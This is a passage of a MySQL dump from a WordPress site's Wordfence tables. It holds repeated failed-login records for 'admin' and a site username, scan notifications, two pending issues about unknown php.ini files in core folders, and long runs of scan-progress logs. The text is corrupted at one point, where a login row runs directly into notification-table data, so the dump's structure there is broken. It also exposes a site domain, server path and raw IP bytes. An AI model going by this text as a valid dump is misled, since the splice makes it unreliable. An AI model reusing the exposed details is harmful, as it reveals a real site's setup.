Gecko'),(1982,7118,1696790375.029400,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\'>F','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1983,7119,1696790382.644000,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\'>F','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1984,7120,1696790468.662724,1,'loginFailValidUsername','admin',1,' 8ϋU^','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1985,7121,1696790470.040892,1,'loginFailValidUsername','admin',1,' 8ϋU^','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1986,7122,1696790637.535505,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1987,7123,1696790638.957363,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1988,7124,1696790783.359669,1,'loginFailValidUsername','admin',1,'*\0Q)xୟGk','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1989,7125,1696790785.507849,1,'loginFailValidUsername','admin',1,'*\0Q)xୟGk','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1990,7126,1696790910.878300,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0WxQ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1991,7127,1696790912.239198,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0WxQ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1992,7128,1696791461.345831,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0H','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1993,7129,1696791462.942256,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0H','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1994,7130,1696791623.957467,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0<$','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1995,7131,1696791625.485012,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0<$','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1996,7138,1696792165.804526,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Uu8j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1997,7139,1696792167.576482,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Uu8j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1998,7140,1696792571.347655,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0|a','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1999,7141,1696792572.967461,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0|a','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2000,7142,1696792752.629024,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Z,','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2001,7143,1696792753.898580,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Z,','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2002,7145,1696793026.204254,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0P;*x)','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2003,7146,1696793027.564979,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0P;*x)','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2004,7147,1696793487.161846,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Ph','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2005,7148,1696793488.831675,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Ph','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2006,7149,1696793805.562770,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0OqV','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2007,7150,1696793806.836505,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0OqV','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2008,7151,1696793839.811354,1,'loginFailValidUsername','admin',1,'&\0cLhz','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2009,7152,1696793841.023411,1,'loginFailValidUsername','admin',1,'&\0cLhz','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2010,7153,1696794008.424221,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Ĕ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2011,7154,1696794010.113424,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Ĕ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2012,7155,1696794162.455833,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2013,7156,1696794163.758585,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2014,7157,1696794480.200416,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2015,7158,1696794481.718921,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2016,7159,1696796350.721110,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0ia}e','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2017,7160,1696796352.348068,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0ia}e','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2018,7170,1696798322.771982,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Z>}','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2019,7171,1696798324.557481,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Z>}','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2020,7172,1696798578.857735,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0](#','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2021,7173,1696798580.843989,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0](#','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2022,7175,1696804550.299469,1,'loginFailValidUsername','admin',1,'(LuGH6','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2023,7176,1696804552.056532,1,'loginFailValidUsername','admin',1,'(LuGH6','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2024,7178,1696812569.228468,1,'loginFailValidUsername','admin',1,'(et\0Kg˖OKd','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2025,7179,1696812570.862339,1,'loginFailValidUsername','admin',1,'(et\0Kg˖OKd','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2026,7182,1696815933.132886,1,'loginFailInvalidUsername','tummyrevolution',0,'&KH`DkB','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2027,7183,1696815934.587997,1,'loginFailInvalidUsername','tummyrevolution',0,'&KH`DkB','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2028,7188,1696822905.493714,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0o}j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2029,7189,1696822907.238822,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0o}j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2030,7191,1696825076.228107,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0W','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2031,7192,1696825077.781418,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0W','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2063,7237,1696850325.371804,1,'loginFailValidUsername','admin',1,'$\0\0\\q$0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2064,7238,1696850327.451540,1,'loginFailValidUsername','admin',1,'$\0\0\\q$0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2065,7239,1696852317.936884,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\01|','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2066,7240,1696852319.200762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\01|','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2067,7247,1696855827.376778,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0PG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2068,7248,1696855828.732429,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0PG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2069,7249,1696855872.845361,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2070,7250,1696855874.114797,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2071,7251,1696856987.527137,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gd.','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2072,7252,1696856988.769308,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gd.','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2073,7257,1696860809.955288,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_Te','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2074,7258,1696860811.647318,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_Te','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2075,7261,1696862590.358735,1,'loginFailInvalidUsername','tummyrevolution',0,' +4L{̂)/?','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2076,7262,1696862592.219949,1,'loginFailInvalidUsername','tummyrevolution',0,' +4L{̂)/?','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2077,7265,1696864801.404061,1,'loginFailValidUsername','admin',1,'(\0Updates are available for 10 plugins and 7 themes','[]'),('network-GQ2TGNZW',1,'toupp-20220714',100,1704989096,'

Wordfence Terms of Service and UK IDTA

\n

Please review the updated Terms of Service with the new UK IDTA.\n

\n

Terms of Service UK IDTA

\n','[]'),('site-AQAAAAA',0,'wfplugin_scan',502,1704137634,'27 issues found in most recent scan','[]'),('site-HEBAAAA',1,'wfplugin_scan',502,1705051053,'33 issues found in most recent scan','[]'); /*!40000 ALTER TABLE `wpvt_wfnotifications` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfpendingissues` -- DROP TABLE IF EXISTS `wpvt_wfpendingissues`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfpendingissues` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `time` int(10) unsigned NOT NULL, `lastUpdated` int(10) unsigned NOT NULL, `status` varchar(10) NOT NULL, `type` varchar(20) NOT NULL, `severity` tinyint(3) unsigned NOT NULL, `ignoreP` char(32) NOT NULL, `ignoreC` char(32) NOT NULL, `shortMsg` varchar(255) NOT NULL, `longMsg` text DEFAULT NULL, `data` text DEFAULT NULL, PRIMARY KEY (`id`), KEY `lastUpdated` (`lastUpdated`), KEY `status` (`status`), KEY `ignoreP` (`ignoreP`), KEY `ignoreC` (`ignoreC`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfpendingissues` -- LOCK TABLES `wpvt_wfpendingissues` WRITE; /*!40000 ALTER TABLE `wpvt_wfpendingissues` DISABLE KEYS */; INSERT INTO `wpvt_wfpendingissues` (`id`, `time`, `lastUpdated`, `status`, `type`, `severity`, `ignoreP`, `ignoreC`, `shortMsg`, `longMsg`, `data`) VALUES (1,1704985322,1704985322,'new','knownfile',75,'9897e0a4518fb661da3d245e7dc7b9c4','7885e84bc882561167dc042e66a4745e','Unknown file in WordPress core: wp-admin/php.ini','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker.','a:9:{s:4:\"file\";s:16:\"wp-admin/php.ini\";s:8:\"realFile\";s:51:\"/home/tummmyov/tummyrevolution.com/wp-admin/php.ini\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:8:\"coalesce\";s:7:\"php.ini\";s:9:\"learnMore\";s:80:\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\";s:10:\"haveIssues\";s:11:\"coreUnknown\";}'),(2,1704985328,1704985328,'new','knownfile',75,'91b19217ac57744d97513e36b1eac0a2','6780a55aecfae646050b5b751748a2e9','Unknown file in WordPress core: wp-includes/php.ini','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker.','a:9:{s:4:\"file\";s:19:\"wp-includes/php.ini\";s:8:\"realFile\";s:54:\"/home/tummmyov/tummyrevolution.com/wp-includes/php.ini\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:8:\"coalesce\";s:7:\"php.ini\";s:9:\"learnMore\";s:80:\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\";s:10:\"haveIssues\";s:11:\"coreUnknown\";}'); /*!40000 ALTER TABLE `wpvt_wfpendingissues` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfreversecache` -- DROP TABLE IF EXISTS `wpvt_wfreversecache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfreversecache` ( `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `host` varchar(255) NOT NULL, `lastUpdate` int(10) unsigned NOT NULL, PRIMARY KEY (`IP`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfreversecache` -- LOCK TABLES `wpvt_wfreversecache` WRITE; /*!40000 ALTER TABLE `wpvt_wfreversecache` DISABLE KEYS */; INSERT INTO `wpvt_wfreversecache` (`IP`, `host`, `lastUpdate`) VALUES (' A\0\0\0\0\0\0\0\0','2001:41d0:2:a1af::1',1704960513),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-23.googlebot.com',1704959941),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-136.googlebot.com',1704957092),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-6.googlebot.com',1705057500); /*!40000 ALTER TABLE `wpvt_wfreversecache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfsecurityevents` -- DROP TABLE IF EXISTS `wpvt_wfsecurityevents`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfsecurityevents` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `type` varchar(255) NOT NULL DEFAULT '', `data` text NOT NULL, `event_time` double(14,4) NOT NULL, `state` enum('new','sending','sent') NOT NULL DEFAULT 'new', `state_timestamp` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(), PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfsecurityevents` -- LOCK TABLES `wpvt_wfsecurityevents` WRITE; /*!40000 ALTER TABLE `wpvt_wfsecurityevents` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wfsecurityevents` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfsnipcache` -- DROP TABLE IF EXISTS `wpvt_wfsnipcache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfsnipcache` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `IP` varchar(45) NOT NULL DEFAULT '', `expiration` timestamp NOT NULL DEFAULT current_timestamp(), `body` varchar(255) NOT NULL DEFAULT '', `count` int(10) unsigned NOT NULL DEFAULT 0, `type` int(10) unsigned NOT NULL DEFAULT 0, PRIMARY KEY (`id`), KEY `expiration` (`expiration`), KEY `IP` (`IP`), KEY `type` (`type`) ) ENGINE=MyISAM AUTO_INCREMENT=9917 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfsnipcache` -- LOCK TABLES `wpvt_wfsnipcache` WRITE; /*!40000 ALTER TABLE `wpvt_wfsnipcache` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wfsnipcache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfstatus` -- DROP TABLE IF EXISTS `wpvt_wfstatus`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfstatus` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `ctime` double(17,6) unsigned NOT NULL, `level` tinyint(3) unsigned NOT NULL, `type` char(5) NOT NULL, `msg` varchar(1000) NOT NULL, PRIMARY KEY (`id`), KEY `k1` (`ctime`), KEY `k2` (`type`) ) ENGINE=MyISAM AUTO_INCREMENT=13418 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfstatus` -- LOCK TABLES `wpvt_wfstatus` WRITE; /*!40000 ALTER TABLE `wpvt_wfstatus` DISABLE KEYS */; INSERT INTO `wpvt_wfstatus` (`id`, `ctime`, `level`, `type`, `msg`) VALUES (13333,1704985517.474537,2,'info','Scanned contents of 2624 additional files at 14.11 per second'),(13334,1704985518.554658,2,'info','Scanned contents of 2634 additional files at 14.08 per second'),(13335,1704985519.578503,2,'info','Scanned contents of 2643 additional files at 14.05 per second'),(13336,1704985520.889692,2,'info','Scanned contents of 2657 additional files at 14.03 per second'),(13332,1704985516.446530,2,'info','Scanned contents of 2613 additional files at 14.13 per second'),(12911,1704725345.182942,1,'info','-------------------'),(12912,1704725345.184597,2,'info','Wordfence used 39.86 MB of memory for scan. Server peak memory usage was: 128.86 MB'),(12913,1704725345.189266,1,'info','Scan Complete. Scanned 16453 files, 15 plugins, 9 themes, 254 posts, 53 comments and 6323 URLs in 5 minutes 47 seconds.'),(12914,1704725345.190151,10,'info','SUM_FINAL:Scan complete. You have 33 new issues to fix. See below.'),(12910,1704725345.167473,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(12909,1704725345.160478,2,'info','Done examining URLs'),(12907,1704725345.144895,10,'info','SUM_START:Scanning for suspicious site options'),(12908,1704725345.158696,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(12906,1704725345.129430,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(12904,1704725344.797980,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(12905,1704725344.813992,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(12853,1704725309.089802,2,'info','Scanned contents of 2674 additional files at 11.58 per second'),(12854,1704725310.127028,2,'info','Scanned contents of 2688 additional files at 11.59 per second'),(12855,1704725311.146840,2,'info','Scanned contents of 2705 additional files at 11.61 per second'),(12856,1704725312.186187,2,'info','Scanned contents of 2721 additional files at 11.62 per second'),(12857,1704725313.194302,2,'info','Scanned contents of 2735 additional files at 11.63 per second'),(12858,1704725314.255357,2,'info','Scanned contents of 2749 additional files at 11.64 per second'),(12859,1704725315.316872,2,'info','Scanned contents of 2763 additional files at 11.65 per second'),(12860,1704725316.364842,2,'info','Scanned contents of 2781 additional files at 11.67 per second'),(12868,1704725325.539480,2,'info','Scanned contents of 2898 additional files at 11.71 per second'),(12867,1704725324.519838,2,'info','Scanned contents of 2879 additional files at 11.68 per second'),(12831,1704725283.998677,2,'info','Scanned contents of 2436 additional files at 11.83 per second'),(12830,1704725282.973108,2,'info','Scanned contents of 2418 additional files at 11.80 per second'),(12829,1704725281.957186,2,'info','Scanned contents of 2404 additional files at 11.79 per second'),(12828,1704725280.955338,2,'info','Scanned contents of 2391 additional files at 11.79 per second'),(12827,1704725279.954027,2,'info','Scanned contents of 2380 additional files at 11.79 per second'),(12826,1704725278.896288,2,'info','Scanned contents of 2365 additional files at 11.78 per second'),(12823,1704725275.765484,2,'info','Scanned contents of 2323 additional files at 11.75 per second'),(12824,1704725276.786487,2,'info','Scanned contents of 2337 additional files at 11.76 per second'),(12825,1704725277.872680,2,'info','Scanned contents of 2350 additional files at 11.76 per second'),(12866,1704725323.486508,2,'info','Scanned contents of 2869 additional files at 11.69 per second'),(12865,1704725322.478640,2,'info','Scanned contents of 2855 additional files at 11.68 per second'),(12864,1704725320.655607,2,'info','Scanned contents of 2848 additional files at 11.74 per second'),(12863,1704725319.478240,2,'info','Scanned contents of 2832 additional files at 11.73 per second'),(12862,1704725318.469042,2,'info','Scanned contents of 2814 additional files at 11.71 per second'),(12861,1704725317.429281,2,'info','Scanned contents of 2798 additional files at 11.69 per second'),(12791,1704725233.834844,2,'info','Scanned contents of 1656 additional files at 10.63 per second'),(12790,1704725232.818985,2,'info','Scanned contents of 1624 additional files at 10.50 per second'),(12789,1704725231.800376,2,'info','Scanned contents of 1591 additional files at 10.35 per second'),(12787,1704725229.772135,2,'info','Scanned contents of 1526 additional files at 10.06 per second'),(12788,1704725230.793995,2,'info','Scanned contents of 1560 additional files at 10.22 per second'),(12786,1704725228.757204,2,'info','Scanned contents of 1493 additional files at 9.91 per second'),(12852,1704725307.956306,2,'info','Scanned contents of 2658 additional files at 11.56 per second'),(12850,1704725305.712099,2,'info','Scanned contents of 2629 additional files at 11.55 per second'),(12851,1704725306.891490,2,'info','Scanned contents of 2646 additional files at 11.57 per second'),(12776,1704725218.559213,2,'info','Scanned contents of 1246 additional files at 8.87 per second'),(12777,1704725219.567260,2,'info','Scanned contents of 1271 additional files at 8.99 per second'),(12778,1704725220.582186,2,'info','Scanned contents of 1292 additional files at 9.07 per second'),(12779,1704725221.616191,2,'info','Scanned contents of 1316 additional files at 9.17 per second'),(12780,1704725222.641742,2,'info','Scanned contents of 1337 additional files at 9.25 per second'),(12781,1704725223.678003,2,'info','Scanned contents of 1362 additional files at 9.36 per second'),(12782,1704725224.706901,2,'info','Scanned contents of 1389 additional files at 9.48 per second'),(12783,1704725225.719854,2,'info','Scanned contents of 1413 additional files at 9.57 per second'),(12784,1704725226.755783,2,'info','Scanned contents of 1438 additional files at 9.67 per second'),(12785,1704725227.756689,2,'info','Scanned contents of 1462 additional files at 9.77 per second'),(12954,1704985267.505022,10,'info','SUM_START:Scanning to check available disk space'),(12955,1704985267.510136,2,'info','Total disk space: 4.17 TB -- Free disk space: 1.91 TB'),(12953,1704985267.490585,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(12952,1704985266.188102,10,'info','SUM_START:Checking for the most secure way to get IPs'),(12949,1704985260.168393,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(12950,1704985262.173519,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(12951,1704985264.178068,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),(12947,1704985259.713009,10,'info','SUM_PREP:Preparing a new scan.'),(12948,1704985259.719589,1,'info','Contacting Wordfence to initiate scan'),(12946,1704985257.142597,1,'info','Scheduled Wordfence scan starting at Thursday 11th of January 2024 03:00:57 PM'),(12945,1704903073.823135,10,'info','SUM_FINAL:Scan complete. You have 17 new issues to fix. See below.'),(12944,1704903073.822345,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(12940,1704903073.551202,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(12941,1704903073.810019,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(12942,1704903073.815409,1,'info','-------------------'),(12943,1704903073.817306,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 87 MB'),(12937,1704903073.537483,1,'info','Initiating quick scan'),(12938,1704903073.542797,10,'info','SUM_START:Checking Web Application Firewall status'),(12939,1704903073.544162,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(12936,1704903073.533089,10,'info','SUM_PREP:Preparing a new scan.'),(12935,1704903070.832625,2,'info','Attempting to resume scan stage (1 attempt(s) remaining)...'),(12934,1704816400.420643,10,'info','SUM_FINAL:Scan complete. You have 17 new issues to fix. See below.'),(12933,1704816400.419938,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(12931,1704816400.412698,1,'info','-------------------'),(12932,1704816400.414622,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 87 MB'),(12930,1704816400.406859,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(12927,1704816400.206191,10,'info','SUM_START:Checking Web Application Firewall status'),(12928,1704816400.207733,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(12929,1704816400.215585,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(12926,1704816400.201944,1,'info','Initiating quick scan'),(12925,1704816400.195590,10,'info','SUM_PREP:Preparing a new scan.'),(12924,1704730471.423343,10,'info','SUM_FINAL:Scan complete. You have 17 new issues to fix. See below.'),(12923,1704730471.422776,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(12921,1704730471.417510,1,'info','-------------------'),(12922,1704730471.419084,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 87 MB'),(12918,1704730471.146892,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(12919,1704730471.163162,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(12920,1704730471.412541,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(12917,1704730471.145244,10,'info','SUM_START:Checking Web Application Firewall status'),(12915,1704730471.126282,10,'info','SUM_PREP:Preparing a new scan.'),(12916,1704730471.131273,1,'info','Initiating quick 